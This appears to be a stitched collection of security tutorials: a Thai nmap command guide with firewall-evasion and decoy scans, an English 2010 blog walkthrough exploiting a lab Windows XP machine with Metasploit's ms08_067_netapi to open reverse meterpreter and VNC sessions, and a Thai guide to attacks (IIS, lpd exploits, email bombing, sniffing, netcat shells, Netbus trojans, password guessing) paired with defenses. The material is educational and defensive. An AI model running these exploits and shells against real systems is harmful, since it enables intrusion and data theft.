nmap

nmap คือ อะไร ?

nmap (Network Mapper) เป็นโปรแกรมที่ใช้ในการสแกนตรวจสอบเครื่อง ต่างจากการใช้ IP Address หรือ ใช้ url ก็ได้ เพื่อที่จะหาข้อมูลเกี่ยวกับเครื่องนั้นๆ เช่น ดูว่าเปิด Port ไหนไว้บ้าง หรือดูว่า ใช้ OS แบบไหน มีการเปิด firewall หรือไม่เป็น ต้น

ที่จะ ยกตัวอย่างต่อไปนี้เป็นเพียงบางส่วนของคำสั่งใน nmap นะครับ

nmap -sP 192.168.0.0/24

-เป็น วิธีการสแกน ping ไปที่หมายเลข IP นั้นๆ ซึ่งไม่จำเป็นที่จะต้องเป็นเหมือนตัวอย่างก็ได้

nmap -sF 192.168.0.0/24

-เป็น การสแกนแบบ Stealth FIN มักจะ ใช้ในการเจาะระบบของ Firewall

nmap -sP -PT80 192.168.0/24

-เป็น การสแกนไปว่ามีเครื่องไหนบ้างที่ทำการเปิดพอร์ต 80 (HTTP) ไว้ ในกรณีนี้สามารถทำการเปลี่ยนหมายเลข Port ได้ตามต้องการ

nmap -sP 192.168.0.0/24 -D 10.0.0.1

-เป็น การเพิ่มค่า IP หลอกเข้าไปเสริม หลังคำสั่ง -D ทำให้ Firewall ตรวจจับได้ยาก

nmap -O 192.168.0.0/24

-จะ เป็นการสแกนดูว่าใช้ระบบปฏิบัติการ(OS)แบบไหน

nmap -O -T4 192.168.0.0/24

-เป็น การเพิ่มความเร็วในการสแกนจากคำสั่ง -T ตามด้วยตัวเลข 0-5 ยิ่ง ตัวเลขมากก็จะยิ่งมีความเร็วในการสแกนเพิ่มมากขึ้น

ทั้ง หมดนี้เป็นเพียงบางส่วนที่ยกมาให้เห็นถึงความหมาย,วิธีใช้คำสั่งและประโยชน์ของ nmap เท่านั้น

ซึ่งหวังว่าจะเป็นประโยชน์แก่ท่านผู้สนใจ ไม่มากก็น้อยนะครับ

Metasploit 3.4.0 on Ubuntu 10.04 a quick introduction

02. Jun, 2010 Categories: Tools by admin View Comments

Perhaps you have heard of metasploit. It is a very powerful exploitation framework developed by HD Moore.

Solid growth has seen an early version that was a few exploits in a perl based wrapper turn into a ruby coded framework that is competing with Core Impact and Canvas in the pen-testing community.

The latest version has recently been released so I thought I would give you a quick and dirty introduction to running it on Ubuntu Linux 10.04. Of course it will run just as easily on Fedora Linux, Windows or whatever Operating System floats your boat.

Download the framework from http://www.metasploit.com/framework/download/

I chose the binary version for 64 bit Linux.

Ruby is not installed by default in Ubuntu so start off with:

apt-get install ruby
chmod +x framework-3.4.0-linux-x86_64.run
./framework-3.4.0-linux-x86_64.run
Verifying archive integrity… All good.
Uncompressing Metasploit Framework v3.4.0-release Installer (64-bit)……..

888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 “888 “88bd8P Y8b888 “88b88K 888 “88b888d88″”88b888888
888 888 88888888888888 .d888888″Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 “Y8888 “Y888″Y888888 88888P’88888P” 888 “Y88P” 888 “Y888
888
888
888

Metasploit Framework v3.4.0 Release
Report Bugs: msfdev@metasploit.com

Warning: A copy of Metasploit already exists at /opt/metasploit3
continuing this installation will DELETE the previous
install, including all user-modified files.

Please enter ‘yes’ to continue or any other key to abort
Continue (yes/no) > yes

This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Removing files from the previous installation…

Extracting the Metasploit operating environment…

Extracting the Metasploit Framework…

Installing links into /usr/local/bin…

Installation complete.

Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes

*** snip ***

Updated to revision 9390.

Launch the Metasploit console by running ‘msfconsole’

Exiting the installer…
root@testbox:/home/testuser/Downloads# msfconsole

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ — –=[ 553 exploits - 264 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
=[ svn r9390 updated today (2010.06.01)

msf > exit

Ok, we now have a working Metasploit, hoorah for us.

Now we want to do a quick exploit of a Windows XP SP2 test machine I have on my network. It is running in Sun Virtual box using Host Only Networking as we will see shortly.

I like to use the command line utility for msf (msfcli) as once you get used to the syntax it is easier and faster. However if you prefer go with the msfconsole.

Running "#msfcli" will list all exploits, payloads and other modules.

#msfcli | grep 08_067
exploit/windows/smb/ms08_067_netapi

Lets hit my windows box with exploit/windows/smb/ms08_067_netapi it is stable and works very well.

#msfcli exploit/windows/smb/ms08_067_netapi
[*] Please wait while we load the module tree…
Usage: /opt/metasploit3/msf3/msfcli
[mode]
========================================================================

Mode Description
—- ———–
(H)elp You’re looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module

#msfcli exploit/windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree…

Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Running the following will display all payloads that will work with ms08_067_netapi. I have selected two in the following examples. A reverse meterpreter and a vnc reverse dll injection.
#msfcli exploit/windows/smb/ms08_067_netapi P

My windows box is 192.168.56.101 and my local Ubuntu system is 192.168.56.1.

# msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree…
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (748032 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050)

meterpreter > run checkvm
[*] Checking if target is a Virtual Machine …..
[*] This is a Sun VirtualBox Virtual Machine
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target…
[*] Checking for contermeasures…
[*] Possible countermeasure found avgemc.exe C:\Program Files\AVG\AVG9\avgemc.exe
[*] Getting Windows Built in Firewall configuration…
[*]
[*] Domain profile configuration:
[*] ——————————————————————-
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] ——————————————————————-
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection firewall configuration:
[*] ——————————————————————-
[*] Operational mode = Enable
[*]
[*] Local Area Connection 2 firewall configuration:
[*] ——————————————————————-
[*] Operational mode = Enable
[*]
[*] Checking DEP Support Policy…
meterpreter > run get_local_subnets
Local subnet: 10.0.2.0/255.255.255.0
Local subnet: 192.168.56.0/255.255.255.0
meterpreter > help

Core Commands
=============

Command Description
——- ———–
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

Stdapi: File system Commands
============================

Command Description
——- ———–
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands
===========================

Command Description
——- ———–
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands
=======================

Command Description
——- ———–
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Get as many privileges as possible
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

Command Description
——- ———–
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components

Priv: Elevate Commands
======================

Command Description
——- ———–
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

Command Description
——- ———–
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

Command Description
——- ———–
timestomp Manipulate file MACE attributes

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\
meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
—- —- —- ————- —-
40777/rwxrwxrwx 0 dir 2009-12-22 05:59:31 +1100 $AVG
100777/rwxrwxrwx 0 fil 2009-12-22 05:39:51 +1100 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2009-12-22 05:39:51 +1100 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2010-02-12 15:23:25 +1100 Documents and Settings
100444/r–r–r– 0 fil 2009-12-22 05:39:51 +1100 IO.SYS
40777/rwxrwxrwx 0 dir 2010-02-11 13:11:43 +1100 Inetpub
100444/r–r–r– 0 fil 2009-12-22 05:39:51 +1100 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2004-08-04 22:00:00 +1000 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2010-04-08 15:57:51 +1000 Program Files
40777/rwxrwxrwx 0 dir 2010-04-09 13:14:56 +1000 RECYCLER
40777/rwxrwxrwx 0 dir 2009-12-22 05:43:08 +1100 System Volume Information
40777/rwxrwxrwx 0 dir 2010-04-09 13:18:19 +1000 WINDOWS
100666/rw-rw-rw- 211 fil 2009-12-22 05:35:20 +1100 boot.ini
100444/r–r–r– 250032 fil 2004-08-04 22:00:00 +1000 ntldr
100666/rw-rw-rw- 301989888 fil 2010-06-01 02:21:17 +1000 pagefile.sys

The power of the meterpreter is really only limited by your imagination. Keylogging, screen captures, adding accounts, dumping the hashes to be cracked offline…..

Now for a vnc injection.

# msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/vncinject/reverse_tcp RHOST=192.168.56.101 LHOST=192.168.56.1 E
[*] Please wait while we load the module tree…
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900…
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name “snipped”
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1062)

This should pop up a vnc session with full desktop control of your Windows XP SP2 Host. This is a good dramatic way to show people the power of metasploit and to reinforce the need for patching to your users.

I did a recent demonstration to a group of corporate helpdesk operators and they were quite surprised at just how easy it can be.

ปิดทางhacker

1. การHack Windows NT /2000 ผ่าน IIS

- Windows NT4.0 และWindows2000 ที่เป็นWeb Server มีช่องทางที่ HackerสามารถHackโดยผ่าน IIS (NT =V.4 ,2000=V.5)

- Hacker ส่งผ่านทางIE(Internet Explorer) หรือNetscape โดยส่งคำที่ให้IIS ตีความผิดแล้วHacker

ก็จะใช้ประโยชน์โดยการสั่งให้Program ที่อยู่บนServerทำงานตามที่สั่งได้

การป้องกันโดยปิดทาง Hackerที่ Hackผ่านทาง IIS

1. ไม่ติดตั้ง IISถ้าไม่จำเป็นต้องใช้งาน

2. ติดตั้ง patch หรือ Service Pack 3

- Service Pack 2 ไม่สามารถปิดรูรั่วได้

- Service Pack 3 สามารถปิดรูรั่วได้

วิธีติดตั้ง Service Pack ควรกระทำหลังจากติดตั้ง Windows 2000 เสร็จใหม่ๆโดยยังไม่ได้ติดตั้ง

Applicationใดๆ หากติดทีหลังอาจทำให้ Applicationทำงานผิดปกติก็เป็นได้

3. Firewall ไม่สามารถป้องกันการ Hack ทาง IISได้

- การทำงานของ Firewall จะทำตาม Access Rule ที่เราป้อนให้เท่านั้น



2. การHackระบบปฏิบัติการ UNIXแบบ Local Hack

- ระบบUNIX จะประกอบด้วย userหลายๆคนโดย userที่ดูแลระบบคือ root (ID =0)ซึ่งมีสิทธิ์ที่จะจัดการกับระบบได้ทุกอย่าง

- การHack จะทำให้ userธรรมดาสามารถเป็น rootได้

การป้องกันการ Hackระบบปฏิบัติการ UNIXแบบ Local

1. ไม่เปิดTelnet ,SSH และFTP ถ้าไม่มีความจำเป็น

- เพราะการHackแบบLocal Hackerจะต้องเอา Program Hack(exploit)ไป Runบน Server

หากมีความจำเป็นต้องเปิดTelnet เพื่อทำการRemoteเข้ามาทำการconfig.เครื่องก็ควรกำหนดเฉพาะ Admin. และUserที่จำเป็นเท่านั้น

2. ไม่ติดตั้งcomplier เช่นProgram gccหรือ make โดยไม่จำเป็น

- Hackerจะต้องทำการ complier Program เป็นbinary เพื่อRun หากไม่จำเป็นไม่ควรติดตั้ง

complierบนServer หากหลีกเลี่ยงไม่ได้Admin.ต้องหมั่นตรวจตราSource Code ของUserอยู่เสมอ

3. Upgrade Packet ที่อ่อนแอให้เป็นVersion ที่แข็งแกร่ง

- ทั้งนี้เนื่องจากProgram Hack(exploit)สามารถทำให้ userกลายเป็นuserผู้ดูแลระบบ( root) นั้นเกิดจาก Packetบางตัวมีช่องโหว่/อ่อนแอ

- Upgrade Packetที่อ่อนแอให้เป็นVersionที่แข็งแกร่งจะป้องกัน SERVERได้

4. Upgrade Versionของ OS



3. การHackระบบปฏิบัติการ UNIXแบบ Remote Hack

Remote Hack = การHack ที่Hacker ไม่จำเป็นต้องทำการTelnet เข้าไปยังServerเป้าหมาย

ระบบปฎิบัติการLinux Redhat 7.0 ถ้าติดตั้งโดยdefault แล้วจะมี serviceที่ชื่อ lpd.(บริการเกี่ยวกับ

PRT. ใช้TCP Port 515) ติดมาด้วยซึ่งเป็นช่องโหว่ให้Hacker เข้าครอบครองServer

- Hackerจะใช้วิธีscan Port เป้าหมายทีละเครื่องด้วยคำสั่ง nmap หรือใช้Prog. Netbus scan

Network

- เครื่องมือที่ใช้ในการ Remote Exploitระบบ Linux Redhat 7.0ทาง lpd portคือ seclpd.c

(เป็น source codeภาษา Cซึ่งไม่สามารถใช้งานได้ทันที ต้องนำไป compileเป็นภาษาเครื่องก่อน)

การป้องกันการ Hackระบบปฏิบัติการ UNIXแบบ Remote

1. เปิดเฉพาะ serviceที่จำเป็น

- ควรปิดservice การบริการlpd. / ถอนPacket นี้จาก Server

2. Upgrade Packetให้เป็น versionที่แข็งแกร่งกว่า

3. ใช้Firewall

- กำหนดAccess Rule เพื่อป้องกันIP ภายนอกทำการติดต่อกับ Port 515ภายใน




4. การBomb e-mail

Bomb e-mail = การส่งe-mail จำนวนมากๆไปยังผู้รับปลายทางในเวลาติดๆกัน มีผลทำให้Mail

-Box ผู้รับเต็มไปด้วยe-mailขยะ

ขั้นตอนการส่งmail

PCของเราส่ง e-mail ไปที่ SMTP Server(Mail Server)เพื่อทำหน้าที่ส่งต่อ e-mail ไปยังMail
Serverภายนอก SMTP Serverจะทำการบันทึก IP Address(PCของเรา)

2. SMTP Serverจะส่ง e-mailต่อไปยัง Serverปลายทาง

- SMTP Server จะตรวจสอบ (โดยcheck จากMX Record ของ Protocol DNS)

- Mail Serverปลายทางจะบันทึก IP Addressของ SMTP Serverโดยเพิ่มไว้บนHeader ของ

e-mailด้วย

3. Userปลายทางรับ mailจาก Mail Serverเขาเอง

- ผู้รับสามารถตรวจสอบได้ว่า mailมาจากเครื่อง IPใด?/ ผ่านSMTP Server/ Mail Serverใดบ้าง?

*** Hackerที่มีประสบการณ์ จะไม่ใช้ e-mail Addressตนเอง + IP Address ของเครื่องในการส่ง

Mail จะใช้จากที่สาธารณะที่เรียกว่า Open Relay/ปลอม e-mailตนเองให้เป็นของคนอื่น

การป้องกันการBomb e-mail

1. กำหนดค่าในMail Server เพื่อไม่ให้รับ e-mail จากIPที่ไม่น่าเชื่อถือ

2. ตรวจจับโดยใช้Software

Linux /Unix ควรเขียนProgram ภาษา C

- ตรวจหัวข้อของe-mail ว่าซ้ำ ?

- หากมาจาก IP เดียวกันให้รับe-mailไม่เกิน 3ฉบับ/นาที

- ใช้Softwareป้องกัน : Arbomb ,Vipul’s Razor

Windows และใช้ Exchange Server

- เขียนProgramโดยใช้ Visual C++

- ใช้ Softwareป้องกัน : GFI Mail Essentials for Exchange /SMTP ,Open Relay Filter Enterprise

Edition , Xwall หรือVOP modusGate Enterprise




5. การปลอม IP เพื่อPostข้อความลงใน Webboard และเพื่อการ Hackของ IIS


- ที่ webboard จะมีการบันทึก IP Addressของผู้ที่ทำการ Postข้อความเก็บไว้ แต่อาจมีการหลอกให้

บันทึก IP Addressเครื่องอื่นที่มิใช่เครื่องของเราโดยใช้ Proxy

- Proxy Server =เครื่อง Com.ที่ทำหน้าที่เป็นตัวกลางระหว่าง Clientกับ Web Serverในการร้องขอ

และจัดส่งหน้า Webpage

- การเรียกชม Websiteสามารถสั่งให้ Proxy Serverทำการร้องขอเอาหน้า Webนั้นได้หาก website

นั้นถูกเรียกใช้งานแล้ว หน้า webนั้นจะถูกเก็บไว้ใน cacheของ Proxy Serverหากเรียกใช้อีกครั้ง

ตัว Proxy Serverจะเอาหน้า webที่อยู่ใน cacheส่งให้ได้เลย



ประโยชน์ของProxy Server

1. เพื่อความเร็วในการDownload หน้าWebpage

2. ประหยัดBandwidth

- ประโยชน์หากProxy Server อยู่ในระบบLANเดียวกับclient และLink ระหว่างGateway ไปหา

ISPที่ความเร็วไม่สูง

3. ประโยชน์ด้านความปลอดภัย(Security)

- สามารถกำหนดUser ให้ชมwebใดได้บ้างโดยกำหนดค่าACL (Access Control List) ที่ตัว

Proxy Server

ในการใช้งาน Proxy Userจะป้อนค่า IP Addressของ Proxy Serverและ Portที่ Proxy Serverเปิด

เพื่อให้บริการ (ปกติ 8080 หรือ 3128) โดย Userจะติดต่อกับ Proxy Serverด้วย Protocol HTTP

Hackerที่มีความชำนาญจะเรียกใช้ Proxy Serverที่อยู่ต่างประเทศซึ่งมีความเร็วสูง/เปิดบริการฟรี

ซึ่งเรียกว่า Public Proxy :จีนซึ่งเป็นประเทศที่มี Hackerชุกชุม

****วิธีที่จะหา Public Proxyก็ใช้ search enginก็สามารถหาได้

****Public Proxyอาจมีการติดตั้ง Program squid(มากับLinux)ซึ่งเปิดโอกาสให้ทุก IP Address

เรียกใช้งานได้

****Program Netbusมีความนิยมใช้scan port (ต้องใส่ช่วง IP Addressที่ต้องการ scanหา Public

Proxyด้วย)

การป้องกันการปลอม IP เพื่อPostข้อความลงใน Webboard

1. ไม่รับการPost จากIP เมืองนอกที่เป็นProxy Server

- ผู้ดูแล Webboardต้องหมั่นตรวจสอบ IPที่อยู่ใน Log file Webboardอยู่เสมอ

- เพิ่ม Codeใน Webboardไม่ให้รับการ Postจาก IPที่ไม่มั่นใจ

2. กรณีเป็นเจ้าของProxy

- กำหนด ACLเฉพาะกลุ่ม IPใน Networkของตนเอง

- ไม่ติดตั้ง Software Proxy Serverถ้าไม่จำเป็น : Wingate ,squid

- ตรวจดู Log fileเมื่อพบคนอื่นเข้ามาเกาะ ก็ควรปรับปรุง ACLโดยเร็ว

- กำหนดค่าใน Firewall / Gatewayเพื่อป้องกัน userใน Networkเราไปเกาะ Proxyคนอื่น






6. การแทรกรูปภาพบนWebboard /สมุดเยี่ยม

การทำงานของ Programใน Webboard

- จะเริ่มการสร้าง Forumโดยให้ผู้ใช้ป้อนอักษรต่างๆ แล้วมีปุ่ม Post(ส่งข้อความ) เพื่อให้ผู้ตั้งหัวข้อ

/ ตอบคำถามใช้ในการ clickเพื่อส่งข้อความ

- หลังจากปุ่ม Postถูกกด Program CGI / ASPที่อยู่ใน Webboardก็จะนำกลุ่มตัวอักษรต่างๆจากบน

Forum มาเก็บไว้ใน Databaseหรือ Text File

- เมื่อผู้เข้ามาเยี่ยมชม webและอ่าน Program CGI / ASPจะไปอ่านข้อมูลใน Databaseแล้ว

ส่งกลับไปให้ Browser เพื่อนำข้อความมาแสดงโดยทำงานตามคำสั่ง HTML

(โดยคำสั่ง HTMLจะอยู่ในเครื่องหมาย < >)

- การแสดงอาจปรากฏเป็นข้อความ /รูปภาพก็เป็นได้

- สาเหตุหลักที่สามารถแทรกรูปภาพเข้าไปยัง Webboardได้ เนื่องจากความไม่รอบคอบในการ

เขียน Programซึ่งไม่ได้ป้องกัน Tag , HTMLในเครื่องหมาย < >

การป้องกันการแทรกรูปภาพและTag HTMLในWebboard /สมุดเยี่ยม

1.ป้องกันเครื่องหมาย < และ > (เป็นวิธีป้องกันที่ดีที่สุด)

- ขั้นตอนการ Postข้อความ

- ก่อนขั้นตอนการบันทึกข้อมูลลง Database

- บันทึกเครื่องหมาย < หรือ > ลง Databaseแต่ป้องกันในขั้นตอนการส่งกลับให้ Browser

2. แสดง IP Address ของผู้ Postด้วย



7. การดักจับ Password ของe-mail โดยใช้ Sniffer

- การทำงานของHub จะมีจุ[คำไม่พึงประสงค์]่อนด้านความปลอดภัยมากกว่า Switch

- Protocol Analyzer

1) เป็นProgram คอยตรวจจับFrame / Packet เพื่อหาสี่งผิดปกติที่เกิดขึ้นในNetworkเพื่อใช้ใน

การวิเคราะห์แก้ปัญหา

2) ศึกษาการทำงานของProtocolต่างๆ

3) วิเคราะห์ข้อมูลที่Com ส่งหากัน

- ตัวอย่างProtocol Analyzer : Sniffer , Ether Real ฯลฯ

*****Sniffer อนุญาตให้ผู้ใช้งานระบุ IP Address , Port และProtocol ที่เครื่อง 2 เครื่องคุยกันได้

เช่น ARP ,DHCP ,Telnet ,SMTP ,POP3 ฯลฯ

*****Sniffer ไม่สามารถดักจับข้อมูลของเครื่องที่ใช้switchได้ [switch ส่งข้อมูลออกเฉพาะ Port

(ช่องเสียบสัญญาณ) ที่มีเครื่องหมายต่ออยู่เท่านั้น]

การป้องกันการดักจับ Password ของe-mail โดยใช้ Sniffer

1. ใช้ Switch แทนHub

- ข้อมูลทุก Frame จะถูกส่งออกจากทุกPort ของHub เมื่อมีผู้ใช้Com. เครื่องใดในNetwork

run Program Snifferก็สามารถดักจับ Frameข้อมูลได้

ใช้ Switch แทน Hub จะเกิดผลดีคือ

Frameข้อมูลจะมีการส่งออกเพียงแค่ Portที่ต่อกับเครื่อง Com.ปลายทางเท่านั้น

Program Snifferสามารถดักจับได้เพียง Frameข้อมูลที่เครื่องตัวเองรับ-ส่งเท่านั้น

- เพิ่มความเร็วของ Network

2. ใช้ Software เพื่อตรวจสอบMode การทำงานของ Network Interface Card ของCom. แต่ละเครื่อง

ใน Network

- Com.ที่Run Program Sniffer NIC (Card LAN) จะทำงานในMode Promiscusus สามารถ

ตรวจสอบได้โดยใช้ Software Anti Sniff ตรวจสอบ

3. เปลี่ยนจากการใช้งาน Applicationที่ไม่มีการเข้ารหัสมาเป็นการเข้ารหัส

- เปลี่ยนจากการใช้ Telnet เป็น Secure(ssh)

4. เปลี่ยนPassword บ่อยๆและกำหนดให้Password มีการหม[คำไม่พึงประสงค์]ายุ

- ไม่ควรใช้Password เดียวกันหลายๆระบบ



8. การทำDenial of Service (DoS)

Denial of Service = การทำให้Serverเป้าหมาย เช่น Web , Mail Database Server ไม่สามารถให้

บริการได้ แบ่งออกเป็น

1. Local DoS = ทำDoS บนเครื่องนั้นๆโดยตรง คือuserทำให้เครื่องหยุดทำงานได้โดยไม่ต้องมี

สิทธิ์ของผู้ดูแลระบบเลย อาจใช้วิธีการTelnet ,FTP ไปยังServerเป้าหมาย

2.Remote DoS = ทำDoS โดยไม่ต้องTelnet ,FTP ไปยังServer เป้าหมาย เพียงแค่รู้IP Address

หรือ Domain ของServerเป้าหมายก็เพียงพอแล้ว

การป้องกันการทำDenial of Service (DoS) [Local DoS]

1. ไม่เปิดTelnet หรือ ssh และ FTPถ้าไม่จำเป็น

- กำหนดสิทธิ์ให้ userที่มีความจำเป็นที่จะต้อง Remoteมายัง Serverเท่าที่จำเป็น

2. ไม่ติดตั้งcomplierเช่น Prog. gcc ,make ถ้าไม่มีความจำเป็น

- Prog. ที่ทำDoS บางตัวจำเป็นต้องเอาcomplier บนServer ก่อน เพื่อให้ทำงานบนOS Versionที่

อยู่บน Serverได้ จึงไม่ควรติดตั้งcomplierบน Server

3. Upgrade Kernel ของOS :ปัจจุบันV.2.4

4. Upgrade Version ของOS เช่นปัจจุบันระบบUNIX Redhat V.8.0




9. การเข้าครอบครองWindows NT/2000 Server

1. การเข้าถึง Command Shell ด้วยNetcat

- Command Shell ของระบบWindows (command.com[CMD.EXE])เป็นตัวเชื่อมระหว่างUser

กับ kernel ของOS (เหมือน ที่อยู่บนระบบUNIX ไม่ว่าจะเป็น Bash Shell หรือShellอื่นๆ)

1.1 Netcat =เป็นการสื่อสารกันทาง TCPระหว่าง Host 2ตัว ซึ่งต้องมีตัวหนึ่งทำหน้าที่รับฟัง

(Listen)โดยฝ่ายที่ไม่เป็น Listen (Client)จะต้องเป็นผู้รับ connetไปยัง Listen ( Server)

***Prog. Netcat เป็นProg. ที่ออกแบบมาทั้งตัวListen และConnet

1.2 การListen ทางTCP Port ด้วยNetcat และการเปลี่ยนทิศทางไปยัง Command Shell

- Prog. Netcat สามารถเปลี่ยนทิศทางของข้อมูลที่ส่งหากันระหว่างClient กับServer

1.3 การConnect TCP จากClient ด้วยNetcat

- Client สามารถconnect ไปServer โดยใช้Netcat หรือProg. Telnetได้

2. การUpload Prog. Netcat ด้วยTFTP

- การยึดครองServer คือการได้มาซึ่งCommand Shell ของServer ดังนั้นต้องหาทางrun Netcat

ที่ Server ให้ได้ อาจใช้ช่องทางIIS

3. TFTP

- เป็นProtocol ที่มีไว้ส่งถ่ายข้อมูลคล้ายFTP เพียงแต่ใช้UDPและไม่ต้องมี Username และ

Password

- สั่งงานในบรรทัดเดียวกัน ก่อให้เกิดความสะดวก / คล่องตัว

- ใช้ในการ Upload / Downloadข้อมูล Prog.ในอุปกรณ์ Network : Router ฯลฯ

3.1 ทำให้ Serverฝ่ายเราเป็น TFTPโดยมี Prog.ที่นิยมมากคือ Tftpd32.exeและให้เครื่อง

เป้าหมายดึงไปใช้

3.2 Run TFTP Clientที่เครื่องเป้าหมาย

- ใช้Prog. Tftp.exe

-ใช้คำสั่ง GET เพื่อนำFile จากTFTP Server (nc.exe)ไปยังเครื่องเป้าหมาย


4. การได้มาซึ่ง Command Shellของ Serverเป้าหมาย

- Run Netcatบน Serverเป้าหมาย โดยเครื่องเป้าหมายจะListenรออยู่ ซึ่งเราก็สามารถconnect

ได้เลย

5.การ Upload Prog. Trojan สามารถทำได้เมื่อมีCommand Shellของ Serverเป้าหมายแล้ว

6.การยึดครอง Serverเป้าหมาย

- Prog. Netbus เป็น Trojan ตัวหนึ่ง ใช้งานง่าย ประกอบด้วย 2 ส่วน

1.ติดตั้งบน Serverเป้าหมาย (File :patch.exe)

2.ติดตั้งบนเครื่องเราเพื่อควบคุมServer(File : Netbus.exe)

การป้องกันการเข้าครอบครองWindows NT/2000 Server

1. ติดตั้ง patch หรือ Service Pack 3

2. ใช้ Firewall (ทำงานเหมือน Router คือForward Packetจาก Networkไปยัง Networkอื่น ตาม

Access Ruleที่ต้องการ)

ติดตั้งAnti Virus บนServer เพื่อป้องกันการUpload Trojan




10. การได้มาซึ่งPassword ของAdministrator บนWindows NT / 2000 Server

1. Essential Net Tools เป็นProg.ที่มีfunctionการทำงานข้างในมากมาย : scanNetwork , Netstat ,

Auditing Tools ฯลฯ

- จะมีFileที่เก็บรายชื่อของ userและ File ที่เก็บคำที่คนมักจะนำมาตั้งเป็นPassword โดยเอา 2Files

มาตรวจสอบดู user ใช้Password ใด

- การเข้าถึงข้อมูลบน Serverคือการใช้ Map Network Driveโดยต้องระบุ IP Addressของ Server

เป้าหมาย และUsername และPassword ของ Admin.ด้วย

- หาก Serverติดตั้ง Terminal Serviceก็ไม่จำเป็นต้องใช้ Map Network Driveโดยสามารถ

connectผ่าน Terminal Serviceได้เลย

2. การประยุกต์ใช้ Tools

- หากใช้ Essential Net Tools ไม่สามารถพบPassword ของAdmin. ได้จำเป็นต้องนำFile

Dictionary (Fileที่มีคำทุกคำในโลก) มาใช้แทนFileของ Essential Net Tools (แทนที่ชื่อ

เดียวกัน /Directoryเดียวกัน) การค้นหาต้องใช้เวลานานจึงอาจจะพบ / ไม่พบ

- ทำการ Auditโดยใช้ Essential Net Toolsใหม่ โอกาสที่จะพบ Passwordมีโอกาสค่อนข้างสูง
